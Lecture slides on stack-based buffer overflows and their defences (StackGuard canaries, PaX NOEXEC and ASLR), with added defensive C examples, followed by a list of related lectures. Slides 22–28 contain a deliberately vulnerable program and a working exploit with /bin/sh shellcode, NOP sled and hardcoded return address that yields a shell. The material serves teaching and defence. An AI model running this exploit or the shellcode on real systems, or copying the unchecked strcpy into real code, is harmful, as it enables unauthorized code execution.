Buffer Overflow and Protection Technology. Department of Computer Science,


1 Buffer Overflow and Protection Technology
Department of Computer Science,
Lorenzo Cavallaro, Andrea Lanzi

2 Table of Contents
- Introduction
- Stack-based Buffer Overflow
  - Buffer overflow introduction
  - Stack and Stack Frame
  - Calling Convention
  - Issue, Injection and Payload execution
- Protection Technology
  - Compiler-enforced protection: Stack Guard, ProPolice SSP
  - Kernel-enforced protection: PaX

3 Introduction (1)
- Privacy-enhancing technologies: Anonymizer, Chaum's Mixes, Onion Routing, Crowds, Anonymous Credentials, Blind Signatures and so on...
- These kinds of technologies try to improve the privacy of active users
- But there is also sensitive data that users don't want to disclose and want to keep private
  - passwords, IM passwords, DB passwords in PHP/ASP applications, personal e-mails, credit card numbers...
- Cryptography can usually help to improve this kind of user privacy, but it's not always deployable

4 Buffer overflow introduction
- Buffer overflows are among the biggest vulnerabilities nowadays
- Writing past the end of a buffer, if properly done, may allow an attacker to execute arbitrary code running with full privileges
- Robert T. Morris Jr.'s worm, The Internet Worm (1988), was the first public example that showed such an exploitation technique
- Aleph1's "Smashing the Stack for Fun and Profit" (1996) is the first underground paper about stack-based buffer overflows

5 The Stack (1)
- It's a memory data structure used by a process as storage for a function's local variables and parameters
- A function Stack Frame (or Activation Record, AR) is associated with each function call. The AR usually holds
  - the function's parameters (if any)
  - the return address (RET): the memory address at which execution resumes once the function has ended
  - the caller's AR memory address (it may not be there at all)
  - the function's local variables (if any)

6 The Stack (2)
- Abstract Data Type, Last-in First-out (LIFO)
- Let S be a stack and e an element. The common stack operations are
  - push(S, e): inserts the element e at the top of the stack S
  - e = pop(S): retrieves the element at the top of the stack S and updates the stack pointer
  - e = top(S): retrieves the top of the stack S

7 The Stack (3)
- i386 computer architecture, Linux operating system
- The stack grows from high memory addresses (bottom of the stack) toward lower ones (top of the stack)
- Write operations are performed from low memory addresses toward higher ones
- Little-endian multibyte storage in memory
- ESP (Extended Stack Pointer): 32-bit CPU register that always points at the top of the stack
- EBP (Extended Base Pointer): 32-bit CPU register, also known as Frame Pointer (FP), that points at the current AR (stack frame)

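8 Stack Layout: function with no arguments

    #include <string.h>

    void function(void)
    {
        int x;          /* local variables live in the function's AR */
        char buf[10];

        x = 5;
        memset(buf, 0, sizeof (buf));
        strcpy(buf, "securephd");   /* 9 characters + terminator: fills buf exactly */
    }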

9 Calling Convention
- Convention used to build the right environment when calling a function
- C declaration syntax (cdecl)
  - parameters are passed on the stack in reverse declaration order
  - it's up to the caller to clean up the allocated stack space
- Standard syntax (stdcall)
  - parameters are passed on the stack in reverse declaration order
  - it's up to the callee to clean up the allocated stack space
- fast call syntax, naked...

10 Function call (1)
- Using the cdecl calling convention, at each function call, the generated assembly code must
  - push the function's parameters on the stack in reverse declaration order
  - call the function (e.g. call function_address), which semantically means
    - push(s, return_address)
    - jump function_address

11 Function call (2)
- At the very beginning of every function there are a few instructions, the prologue, that are executed when the function gains control
  - push(s, EBP)
  - EBP = ESP
- This way the function can use EBP, the frame pointer, to address its local variables (using negative offsets) and its parameters (using positive offsets)

12 Automatic variables
- After the prologue has executed, the function allocates space on the stack for its local variables (if any)
  - with an explicit stack pointer operation (e.g. sub $0x10, %esp)
  - with an implicit stack pointer operation (e.g. pushl $0x )
- Automatic variables are allocated on the stack, hence the usual scope rules apply
  - local variables are visible only within their Activation Record
  - they are not available once the function has terminated

13 Function termination
- At the very end of every function there are a few instructions, the epilogue, which are executed when the function is about to terminate. The epilogue undoes what the prologue did
  - ESP = EBP (e.g. mov %ebp, %esp)
  - EBP = pop(s) (e.g. popl %ebp)
- The function ends its execution, returning to the caller, by issuing a ret instruction, which semantically corresponds to EIP = pop(s). This retrieves the Saved Return Address previously pushed on the stack by the function call

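14 Stack Layout: function with arguments

    #include <stdio.h>
    #include <stdlib.h>

    int sum(int a, int b)
    {
        return (a + b);
    }

    int main(void)
    {
        int res;

        res = sum(5, 6);    /* cdecl: 6 is pushed first, then 5 */
        printf("sum is: %d\n", res);
        exit(0);
    }

(Addresses annotated in the slide's figure: 0x080483b3, 0x080483b8, 0x80483da)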
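The call sequence from slides 9 to 13, traced on a simulated i386 stack for the sum(5, 6) call above. This is an added example, not code from the original slides; the stack base address, the initial ESP/EBP values and the roles given to 0x080483b8 and 0x080483da are assumptions made for the illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define STACK_BOTTOM 0xbffff900u /* constructed: address just above the stack */
#define RET_ADDR     0x080483b8u /* assumed role: instruction after the call */
#define SUM_ADDR     0x080483dau /* assumed role: entry point of sum() */
#define WORDS        64

struct cpu { uint32_t esp, ebp, eip, eax, mem[WORDS]; };
struct trace {
    uint32_t result, eip_after, sret_seen;
    int esp_restored, ebp_restored;
};

/* Word at a simulated address; index 0 holds the highest address. */
static uint32_t *at(struct cpu *c, uint32_t addr)
{
    return &c->mem[(STACK_BOTTOM - addr) / 4 - 1];
}

/* The stack grows toward lower addresses: push decrements ESP first. */
static void push(struct cpu *c, uint32_t v) { c->esp -= 4; *at(c, c->esp) = v; }
static uint32_t pop(struct cpu *c)
{
    uint32_t v = *at(c, c->esp);
    c->esp += 4;
    return v;
}

/* call = push(s, return_address); jump function_address */
static void call(struct cpu *c, uint32_t target, uint32_t ret_addr)
{
    push(c, ret_addr);
    c->eip = target;
}

static void prologue(struct cpu *c) { push(c, c->ebp); c->ebp = c->esp; }
static void epilogue(struct cpu *c) { c->esp = c->ebp; c->ebp = pop(c); }
static void ret(struct cpu *c)      { c->eip = pop(c); }

struct trace run_sum(uint32_t a, uint32_t b)
{
    struct cpu c = { .esp = STACK_BOTTOM - 32, .ebp = STACK_BOTTOM - 16 };
    uint32_t esp0 = c.esp, ebp0 = c.ebp;
    struct trace t;

    push(&c, b);                       /* caller: parameters in reverse order */
    push(&c, a);
    call(&c, SUM_ADDR, RET_ADDR);
    prologue(&c);                      /* callee gains control */
    c.esp -= 0x10;                     /* room for locals: sub $0x10, %esp */
    t.sret_seen = *at(&c, c.ebp + 4);  /* SRET sits just above the saved EBP */
    c.eax = *at(&c, c.ebp + 8) + *at(&c, c.ebp + 12); /* a + b, positive offsets */
    epilogue(&c);
    ret(&c);                           /* EIP = pop(s) */
    c.esp += 8;                        /* cdecl: the caller frees the arguments */

    t.result = c.eax;
    t.eip_after = c.eip;
    t.esp_restored = (c.esp == esp0);
    t.ebp_restored = (c.ebp == ebp0);
    return t;
}

int main(void)
{
    struct trace t = run_sum(5, 6);

    printf("sum is: %u, EIP after ret: 0x%08x\n",
           (unsigned)t.result, (unsigned)t.eip_after);
    printf("SRET seen at EBP+4: 0x%08x, ESP restored: %d, EBP restored: %d\n",
           (unsigned)t.sret_seen, t.esp_restored, t.ebp_restored);
    return 0;
}
```

The value ret loads into EIP is whatever word sits at EBP+4 when the epilogue runs, which is why the following slides focus on protecting that slot.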

15 Buffer Overflow (1)
- C strings are nil-terminated (\0) sequences of bytes (char arrays)

      \0STRING 2\0          (string 1, string 2)
      VERY BIG STRING\0     (string 3)

- Copying string 3 into string 1 without checking the target boundaries, we'll get

      VERY BIG STRING\0G 2\0

16 Buffer Overflow (2)
- A buffer overflow occurs when more data is written into a buffer than it can hold, causing it to overflow
- Remember that the stack grows toward lower memory addresses while memory writes go toward higher memory addresses
- Besides local data, the stack holds sensitive information, such as the Saved Return Address (SRET)
- What happens if we can make a buffer overflow so as to overwrite important information, such as SRET, stored on the stack?

17 Buffer Overflow (3)
- At function termination, after the epilogue, the ret (0xc3) assembly instruction is executed
- If, by exploiting a buffer overflow vulnerability, the SRET gets overwritten, the attacker gains control of the EIP register, which governs the process execution flow
- Once EIP is subverted, what remains is to choose where to redirect this flow
- Usually the hijacked execution flow is redirected to code written and injected by the attacker. This code is called the payload (shellcode, egg,...)

18 Injection (1)
- Talking about buffer overflows usually implies talking about the injection vector and the payload
- The injection vector is the ad hoc built vector which will be sent to the vulnerable process. It may hold
  - the payload's address
  - the payload
  - ...
- The payload is the code the attacker wants to execute
- Both the injection vector and the payload are architecture and OS dependent

19 Payload execution
- Direct jump
  - the payload's address must be guessed
  - addresses may contain nil bytes
  - the payload's address may change (security patches such as PaX ASLR)
  - issue about the target vulnerable buffer size
- Payload stored in the vulnerable process environment
- Pop return
- Call register
- Push return

20 No Operation
- Assembly instruction that executes no operation (0x90)
- Combined with a direct jump, it increases the margin of error the attacker is allowed when guessing the payload's memory address
- With NOPs, the jump can fall anywhere on a landing area
- Usually the injection vector looks like

      NOP..NOP PAYLOAD RETADDR..RETADDR

21 Advanced techniques (overview)
- Off-by-one (SFP LSB overwrite)
- stack function pointer overwriting
- heap overflow (free/malloc chunk overwriting)
- advanced payloads
  - IDS evasion
  - alphanumeric
  - polymorphic
  - encrypted

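22 Example: vuln.c (1)

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    int vuln(char *s);

    int main(void)
    {
        char buf[512];
        int done = 0;

        while (!done) {
            memset(buf, 0, sizeof (buf));
            /* stop on EOF or read error instead of looping on an empty buffer */
            if (read(0, buf, sizeof (buf) - 1) <= 0)
                break;
            /* drop the trailing newline, if any */
            buf[strcspn(buf, "\n")] = 0;
            done = vuln(buf);
        }
        exit(0);
    }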

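23 Example: vuln.c (2)

    int vuln(char *s)
    {
        char small[128];

        memset(small, 0, sizeof (small));
        if (!strncmp(s, "exit", 4))
            return 1;
        /* the vulnerability: s may hold up to 511 bytes, small only 128 */
        strcpy(small, s);
        /*
         * The format string of the next call is garbled in the transcription;
         * the exploit's comments say vuln prints the buffer's address, so %p
         * is assumed here.
         */
        printf("[+] small: %p\n", (void *)small);
        printf("[+] small: %s\n", small);
        return 0;
    }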

24 Example: vuln execution (1)

    $ ./vuln
    Buffer Overflow
    [+]
    [+] small: Buffer Overflow
    exit
    $ perl -e '{ print "A" x 160 }' | ./vuln
    [+]
    [+] small: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAA
    zsh: 3477 done                              perl -e '{ print "A" x 160 }' |
    zsh: 3478 segmentation fault (core dumped)  ./vuln

25 Example: vuln execution (2)

    $ gdb -q -c core
    Core was generated by `./vuln'.
    Program terminated with signal 11, Segmentation fault.
    #0  0x in ?? ()
    (gdb) info reg eip
    eip            0x x
    (gdb) quit
    $ (./x ; cat) | ./vuln
    [+]
    [+] small: (garbage)...
    id
    uid=1000(sullivan) gid=100(users)...
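The crash above comes from the unbounded strcpy() into small[128]. The following added example (not part of the original slides) puts a common incomplete fix next to two sound ones; the function names and the input_of() helper are hypothetical and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

#define SMALL_SIZE 128              /* same size as small[] in vuln.c */

static char demo_dst[SMALL_SIZE];   /* destination used by the demo calls */

/* Build a constructed input of n 'A' characters (n must be below 256). */
static const char *input_of(size_t n)
{
    static char in[256];

    memset(in, 'A', n);
    in[n] = '\0';
    return in;
}

/* Incomplete fix: strncpy() bounds the write but leaves dst without a
 * terminator when the source has SMALL_SIZE or more characters.
 * Returns 1 if dst ended up nil-terminated, 0 otherwise. */
int copy_strncpy(char dst[SMALL_SIZE], const char *s)
{
    strncpy(dst, s, SMALL_SIZE);
    return memchr(dst, '\0', SMALL_SIZE) != NULL;
}

/* Truncating fix: snprintf() always terminates dst and reports the length
 * the input needed. Returns 1 if the input was truncated, 0 if it fit. */
int copy_truncate(char dst[SMALL_SIZE], const char *s)
{
    int n = snprintf(dst, SMALL_SIZE, "%s", s);

    return n < 0 || (size_t)n >= SMALL_SIZE;
}

/* Rejecting fix with the shape of vuln():
 * 1 = "exit", 0 = input handled, -1 = input rejected as too long. */
int vuln_checked(const char *s)
{
    char small[SMALL_SIZE];

    if (!strncmp(s, "exit", 4))
        return 1;
    /* Look for the terminator within the first SMALL_SIZE bytes only. */
    if (memchr(s, '\0', SMALL_SIZE) == NULL)
        return -1;
    memcpy(small, s, strlen(s) + 1);    /* length already proven to fit */
    printf("[+] small: %s\n", small);
    return 0;
}

int main(void)
{
    /* 160 bytes is the input length used in the slides' crash. */
    printf("strncpy, 160 bytes: terminated=%d\n",
           copy_strncpy(demo_dst, input_of(160)));
    printf("snprintf, 160 bytes: truncated=%d\n",
           copy_truncate(demo_dst, input_of(160)));
    printf("checked, 160 bytes: %d\n", vuln_checked(input_of(160)));
    printf("checked, 127 bytes: %d\n", vuln_checked(input_of(127)));
    return 0;
}
```

The boundary sits at 127 characters: 128 no longer leaves room for the terminator, the off-by-one case listed among the advanced techniques on slide 21.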

26 Exploit (1)

    #include <stdio.h>
    #include <string.h>

    #define RETADDR 0xbffff8a0
    #define NOP     0x90

    unsigned char shellcode[] =
        "\xeb\x15\x5b\x31\xc0\x89\x5b\x08\x89\x43\x0c"
        "\x88\x43\x07\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd"
        "\x80\xe8\xe6\xff\xff\xff/bin/sh";

    int main(void)
    {
        char buf[160];
        int i;
        char *p;

        /* zero out buffer */
        memset(buf, 0, sizeof (buf));

27 Exploit (2)

        /*
         * Fill with the return address, the address at which we want to jump to,
         * the address at which the vulnerable buffer is stored and that we have
         * filled with NOP..NOP, shellcode, RETADDR..RETADDR... hence with our
         * payload too
         */
        for (i = 0; i < sizeof (buf); i += 4)
            *(unsigned int *)(buf + i) = RETADDR;

        /*
         * Fill the buffer with 20 bytes of NOP even if we don't need them
         * since we already know at which address our payload will be (in the
         * injected vector): it's the vuln program that prints this for us
         */
        memset(buf, NOP, 20);
        ...

28 Exploit (3)

        /*
         * then follows the payload that we want to execute, our shellcode.
         */
        p = (buf + 20);
        for (i = 0; i < strlen((char *)shellcode); i++)
            p[i] = shellcode[i];

        buf[sizeof(buf) - 1] = 0;
        printf("%s\n", buf);
    }

29 Protection Technology
- The buffer overflow issue may be solved in different ways in order to prevent execution flow hijacking and arbitrary code execution
- There are two main categories:
  - Compiler-enforced protection (e.g. Stack Guard): compilers have complete knowledge of the structure of the binary, so they can modify the program's stack layout in order to prevent, or at least detect and stop, buffer overflows
  - Kernel-enforced protection (e.g. Grsecurity, PaX): the kernel cannot modify the program's stack layout since it doesn't know anything about it, but it has complete knowledge of a process' virtual address space layout, so it can apply access controls to pages of memory in order to prevent execution of arbitrary code

30 Stack Guard (1)
- Stack Guard is a compiler-enforced protection technology
- Implemented in the GNU C compiler, it stops stack-based buffer overflow vulnerabilities while introducing just a small performance cost
- Integrity check on the Activation Records
  - it detects overwriting of the control information (SRET)
- Issue with this solution: the attacker may choose to execute a payload already in memory (or injected in other places)
- As a safeguard measure, a canary location is inserted before the sensitive control information on the stack

31 Stack Guard (2)
- The canary value should be hard for an attacker both to detect and to spoof
- The canary location is initialized just after the control information has been saved on the stack, i.e. after the prologue is executed
- The canary location is checked just before the control information is restored, i.e. before the epilogue is executed
- This way the control information is protected, since the canary is checked just before that information gets restored

32 Stack Guard (3)
- There are four types of stack canaries:
  - NULL canary: introduced by der Mouse, consists of a 0x value.
  - Terminator canary: detects string overflows but has a known value: CR, LF, NULL, -1.
    - Since many functions that manage strings use those values as string terminators, it shouldn't be possible to write past the end of the vulnerable buffers
    - All functions that write to memory without directly managing strings, such as memcpy(3), may bypass these canaries

33 Stack Guard (4)
  - Random canary: detects all memory writes that are not able to guess the canary value, hence defeating the buffer overflow issue
    - Usually the canary is a global variable initialized at program startup. The attacker has to guess this value in order to exploit the vulnerability successfully
  - Random XOR canary: acts like the random canary but adds an integrity check on the protected control information, by performing an XOR operation between the canary and that information and storing the result in the canary location
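The canary placement from slide 31 and the behaviour of the terminator, random and random XOR canaries from slides 32 and 33, run on a simulated activation record so that every out-of-bounds write stays well-defined C. This is an added example, not StackGuard's code or code from the slides; the frame layout, the terminator word 0x000aff0d, the sample addresses and the fixed secret are assumptions (a real random canary is drawn at program startup).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated frame, lowest address first: buf[16] | canary | saved EBP | SRET */
enum { CANARY = 16, SFP = 20, SRET = 24, FRAME = 28 };
enum kind { TERMINATOR, RANDOM, RANDOM_XOR };
enum mode { STRING_COPY, RAW_COPY, SRET_ONLY };

#define TERM_CANARY 0x000aff0du /* assumed packing of NULL, LF, -1, CR */
#define SECRET      0x5eed1234u /* constructed stand-in for the random value */
#define GOOD_RET    0x080483b8u /* constructed legitimate return address */
#define EVIL_RET    0x41414141u /* constructed overwriting value ("AAAA") */

struct frame { unsigned char mem[FRAME]; enum kind kind; uint32_t secret; };
struct outcome { int detected, sret_changed; };

static uint32_t get32(const struct frame *f, int off)
{
    uint32_t v;
    memcpy(&v, f->mem + off, sizeof v);
    return v;
}
static void set32(struct frame *f, int off, uint32_t v)
{
    memcpy(f->mem + off, &v, sizeof v);
}

/* After the prologue: control data is saved, then the canary is set. */
static void enter(struct frame *f, enum kind k, uint32_t secret)
{
    memset(f->mem, 0, FRAME);
    f->kind = k;
    f->secret = (k == TERMINATOR) ? TERM_CANARY : secret;
    set32(f, SFP, 0xbffff8c8u);                 /* constructed saved EBP */
    set32(f, SRET, GOOD_RET);
    set32(f, CANARY, k == RANDOM_XOR ? f->secret ^ GOOD_RET : f->secret);
}

/* Before the epilogue: returns 1 when the frame must not be trusted. */
static int corrupted(const struct frame *f)
{
    uint32_t c = get32(f, CANARY);
    if (f->kind == RANDOM_XOR)
        c ^= get32(f, SRET);                    /* ties the canary to SRET */
    return c != f->secret;
}

struct outcome simulate(enum kind k, uint32_t guess, enum mode m)
{
    struct frame f;
    unsigned char in[FRAME];
    uint32_t ret = EVIL_RET;
    struct outcome o;
    size_t i;

    enter(&f, k, SECRET);
    memset(in, 'A', FRAME);                     /* over-long input: filler, */
    memcpy(in + CANARY, &guess, sizeof guess);  /* a guess for the canary,  */
    memcpy(in + SRET, &ret, sizeof ret);        /* and a new SRET           */
    if (m == STRING_COPY) {                     /* strcpy-like: ends at NUL */
        for (i = 0; i < FRAME; i++) {
            f.mem[i] = in[i];
            if (in[i] == 0)
                break;
        }
    } else if (m == RAW_COPY) {                 /* memcpy-like */
        memcpy(f.mem, in, FRAME);
    } else {                                    /* write landing on SRET only */
        set32(&f, SRET, EVIL_RET);
    }
    o.detected = corrupted(&f);
    o.sret_changed = get32(&f, SRET) != GOOD_RET;
    return o;
}

int main(void)
{
    static const struct { enum kind k; uint32_t g; enum mode m; const char *what; } c[] = {
        { TERMINATOR, EVIL_RET,    STRING_COPY, "terminator, string copy, filler" },
        { TERMINATOR, TERM_CANARY, STRING_COPY, "terminator, string copy, canary replayed" },
        { TERMINATOR, TERM_CANARY, RAW_COPY,    "terminator, raw copy, canary replayed" },
        { RANDOM,     TERM_CANARY, RAW_COPY,    "random, raw copy, wrong guess" },
        { RANDOM,     0,           SRET_ONLY,   "random, SRET-only write" },
        { RANDOM_XOR, 0,           SRET_ONLY,   "random XOR, SRET-only write" },
    };
    size_t i;

    for (i = 0; i < sizeof c / sizeof c[0]; i++) {
        struct outcome o = simulate(c[i].k, c[i].g, c[i].m);
        printf("%-42s detected=%d sret_changed=%d\n",
               c[i].what, o.detected, o.sret_changed);
    }
    return 0;
}
```

The rows to compare are the two with detected=0 and sret_changed=1: the known terminator value offers nothing against a raw copy, and only the XOR variant notices a write that skips the canary word.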

34 PaX
- PaX is a kernel-enforced protection technology
- It offers prevention against arbitrary code execution via
  - memory management access controls, NOEXEC
  - address space layout randomization, ASLR
- It is embedded in the Grsecurity Linux kernel patch, which also offers
  - read-only sys_call_table, IDT and GDT
  - /dev/kmem, /dev/mem and /dev/port protections
  - /proc and chroot(2) restrictions
  - Trusted Path Execution, pseudo-random PID, IP ID, TCP ISN and TCP source ports, socket creation restrictions

35 PaX NOEXEC
- It aims to prevent the injection and execution of arbitrary code into a process' address space
- It makes all the memory that holds the stack, heap, data and anonymous mappings non-executable
- There are two approaches on the IA-32 architecture
  - PAGEEXEC, which uses the paging logic of the CPU
  - SEGMEXEC, which uses the segmentation logic of the CPU
- Since page protection rights originate from the mmap(2) syscall and can be changed by mprotect(2), there is also the MPROTECT feature, in order to enforce this protection
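A way to check the property NOEXEC aims for, by auditing a process memory map in the Linux /proc/<pid>/maps format for mappings that are writable and executable at once and for an executable stack or heap. This is an added example, not PaX code or code from the slides; both sample maps are constructed, and audit_maps() and struct audit are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

struct audit { int mappings, writable_exec, exec_stack_heap; };

/* Constructed sample: data, heap, anonymous and stack areas non-executable. */
static const char SAMPLE_NOEXEC[] =
    "08048000-08049000 r-xp 00000000 08:01 1234 /home/user/vuln\n"
    "08049000-0804a000 rw-p 00000000 08:01 1234 /home/user/vuln\n"
    "0804a000-0806b000 rw-p 00000000 00:00 0 [heap]\n"
    "b7fd9000-b7fdb000 rw-p 00000000 00:00 0 \n"
    "bffeb000-c0000000 rw-p 00000000 00:00 0 [stack]\n";

/* Constructed sample: the same layout with executable data areas. */
static const char SAMPLE_LEGACY[] =
    "08048000-08049000 r-xp 00000000 08:01 1234 /home/user/vuln\n"
    "08049000-0804a000 rwxp 00000000 08:01 1234 /home/user/vuln\n"
    "0804a000-0806b000 rwxp 00000000 00:00 0 [heap]\n"
    "b7fd9000-b7fdb000 rwxp 00000000 00:00 0 \n"
    "bffeb000-c0000000 rwxp 00000000 00:00 0 [stack]\n";

/* Walk the text line by line: start-end perms offset dev inode [path]. */
struct audit audit_maps(const char *maps)
{
    struct audit a = { 0, 0, 0 };

    while (*maps) {
        char line[256], perms[5] = "", path[64] = "";
        unsigned long start, end;
        size_t n = strcspn(maps, "\n");
        size_t c = n < sizeof line - 1 ? n : sizeof line - 1;
        int w, x;

        memcpy(line, maps, c);
        line[c] = '\0';
        maps += n + (maps[n] == '\n');

        /* The path is optional: anonymous mappings stop after the inode. */
        if (sscanf(line, "%lx-%lx %4s %*s %*s %*s %63[^\n]",
                   &start, &end, perms, path) < 3)
            continue;                   /* not a mapping line */
        a.mappings++;
        w = perms[1] == 'w';
        x = perms[2] == 'x';
        if (w && x)
            a.writable_exec++;          /* injected bytes could be executed */
        if (x && (!strcmp(path, "[stack]") || !strcmp(path, "[heap]")))
            a.exec_stack_heap++;
    }
    return a;
}

static void report(const char *name, struct audit a)
{
    printf("%-16s mappings=%d writable+exec=%d exec stack/heap=%d\n",
           name, a.mappings, a.writable_exec, a.exec_stack_heap);
}

int main(void)
{
    static char self[65536];
    FILE *fp = fopen("/proc/self/maps", "r");

    report("noexec sample", audit_maps(SAMPLE_NOEXEC));
    report("legacy sample", audit_maps(SAMPLE_LEGACY));
    if (fp != NULL) {                   /* audit the running process too */
        size_t n = fread(self, 1, sizeof self - 1, fp);
        self[n] = '\0';
        fclose(fp);
        report("this process", audit_maps(self));
    }
    return 0;
}
```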

36 PaX ASLR (1)
- Address Space Layout Randomization attempts to render exploits that depend on fixed addresses useless
- It introduces a small amount of randomness into the layout of the process' virtual memory space
- There are several memory areas that need this randomness
  - RANDUSTACK: randomizes the user land stack addresses; it's the kernel that creates the process' stack layout
  - RANDKSTACK: randomizes the kernel land stack addresses associated with each task structure

37 PaX ASLR (2)
  - RANDMMAP: handles the randomization of all file and anonymous memory mappings (mmap(2), brk(2))
  - RANDEXEC: randomizes the location of ET_EXEC ELF binaries
    - it loads the executable at the standard address, which lies in non-executable pages
    - an executable copy of the binary is created at a random location using the RANDMMAP feature
    - execution attempts flow back into the randomized mapping via a page fault handler if the non-executable page is accessed instead of the randomly relocated image


More information

143A: Principles of Operating Systems. Lecture 5: Calling conventions. Anton Burtsev January, 2017

143A: Principles of Operating Systems. Lecture 5: Calling conventions. Anton Burtsev January, 2017 143A: Principles of Operating Systems Lecture 5: Calling conventions Anton Burtsev January, 2017 Stack and procedure calls Stack Main purpose: Store the return address for the current procedure Caller

More information

Stacks and Frames Demystified. CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han

Stacks and Frames Demystified. CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han s and Frames Demystified CSCI 3753 Operating Systems Spring 2005 Prof. Rick Han Announcements Homework Set #2 due Friday at 11 am - extension Program Assignment #1 due Tuesday Feb. 15 at 11 am - note extension

More information

Computer Systems Lecture 9

Computer Systems Lecture 9 Computer Systems Lecture 9 CPU Registers in x86 CPU status flags EFLAG: The Flag register holds the CPU status flags The status flags are separate bits in EFLAG where information on important conditions

More information

About unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos

About unchecked management SMM & UEFI. Vulnerability. Patch. Conclusion. Bruno Pujos. July 16, Bruno Pujos July 16, 2016 1/45 Whoami RE, vulnerability research LSE 2015 Sogeti since 2/45 1 2 Reverse Exploitation 3 4 3/45 Agenda 1 4/45 Agenda 1 5/45 Unified Extended FIrmware is based on EFI Specification for

More information

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta

Stack Vulnerabilities. CS4379/5375 System Security Assurance Dr. Jaime C. Acosta 1 Stack Vulnerabilities CS4379/5375 System Security Assurance Dr. Jaime C. Acosta Part 1 2 3 An Old, yet Still Valid Vulnerability Buffer/Stack Overflow ESP Unknown Data (unused) Unknown Data (unused)

More information

CS429: Computer Organization and Architecture

CS429: Computer Organization and Architecture CS429: Computer Organization and Architecture Warren Hunt, Jr. and Bill Young Department of Computer Sciences University of Texas at Austin Last updated: October 1, 2014 at 12:03 CS429 Slideset 6: 1 Topics

More information

Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits

Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Hands-on Ethical Hacking: Preventing & Writing Buffer Overflow Exploits OWASP AppSec 2013 Rochester OWASP Chapter Lead Ralph Durkee - Durkee Consulting, Inc. info@rd1.net Hands-on Ethical Hacking: Preventing

More information

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from

Buffer Overflows. Buffer Overflow. Many of the following slides are based on those from s Many of the following slides are based on those from 1 Complete Powerpoint Lecture Notes for Computer Systems: A Programmer's Perspective (CS:APP) Randal E. Bryant and David R. O'Hallaron http://csapp.cs.cmu.edu/public/lectures.html

More information

Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut

Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut CSE 5095 & ECE 6095 Spring 2016 Instructor Marten van Dijk System Security Lecture 1 Buffer Overflows Syed Kamran Haider Department of Electrical & Computer Engineering University of Connecticut Email:

More information

Do-While Example. In C++ In assembly language. do { z--; while (a == b); z = b; loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero

Do-While Example. In C++ In assembly language. do { z--; while (a == b); z = b; loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero Do-While Example In C++ do { z--; while (a == b); z = b; In assembly language loop: addi $s2, $s2, -1 beq $s0, $s1, loop or $s2, $s1, $zero 25 Comparisons Set on less than (slt) compares its source registers

More information

Numbers: positional notation. CS61C Machine Structures. Faux Midterm Review Jaein Jeong Cheng Tien Ee. www-inst.eecs.berkeley.

Numbers: positional notation. CS61C Machine Structures. Faux Midterm Review Jaein Jeong Cheng Tien Ee. www-inst.eecs.berkeley. CS 61C Faux Midterm Review (1) CS61C Machine Structures Faux Midterm Review 2002-09-29 Jaein Jeong Cheng Tien Ee www-inst.eecs.berkeley.edu/~cs61c/ Numbers: positional notation Number Base B B symbols

More information

143A: Principles of Operating Systems. Lecture 4: Calling conventions. Anton Burtsev October, 2017

143A: Principles of Operating Systems. Lecture 4: Calling conventions. Anton Burtsev October, 2017 143A: Principles of Operating Systems Lecture 4: Calling conventions Anton Burtsev October, 2017 Recap from last time Stack and procedure calls What is stack? Stack It's just a region of memory Pointed

More information

Final exam. Scores. Fall term 2012 KAIST EE209 Programming Structures for EE. Thursday Dec 20, Student's name: Student ID:

Final exam. Scores. Fall term 2012 KAIST EE209 Programming Structures for EE. Thursday Dec 20, Student's name: Student ID: Fall term 2012 KAIST EE209 Programming Structures for EE Final exam Thursday Dec 20, 2012 Student's name: Student ID: The exam is closed book and notes. Read the questions carefully and focus your answers

More information

Foundations of Network and Computer Security

Foundations of Network and Computer Security Foundations of Network and Computer Security John Black Lecture #20 Nov 4 th 2004 CSCI 6268/TLEN 5831, Fall 2004 Announcements Quiz #3 Today Need to know what big-endian is Remind me to mention it if I

More information

Computer Architecture and Assembly Language. Practical Session 3

Computer Architecture and Assembly Language. Practical Session 3 Computer Architecture and Assembly Language Practical Session 3 Advanced Instructions division DIV r/m - unsigned integer division IDIV r/m - signed integer division Dividend Divisor Quotient Remainder

More information

Security Lab. Episode 6: Format String Vulnerabilities. Jan Nordholz, Matthias Petschick, Julian Vetter

Security Lab. Episode 6: Format String Vulnerabilities. Jan Nordholz, Matthias Petschick, Julian Vetter Security Lab Episode 6: Format String Vulnerabilities Jan Nordholz, Matthias Petschick, Julian Vetter Prof. Jean-Pierre Seifert Security in Telecommunications TU Berlin SoSe 2015 jan, matthias, julian

More information

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University

Hacking Blind. Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh. Stanford University Hacking Blind Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, Dan Boneh Stanford University Hacking 101 Exploit GET /0xDEAD HTTP/1.0 shell $ cat /etc/passwd root:x:0:0:::/bin/sh sorbo:x:6:9:pac:/bin/sh

More information

Chapter 7: User Defined Functions and Stack Mechanics

Chapter 7: User Defined Functions and Stack Mechanics Chapter 7: User Defined Functions and Stack Mechanics Objectives: (a) Demonstrate the ability to analyze simple programs that use library and user defined functions. (b) Describe the organization and contents

More information

CS642: Computer Security

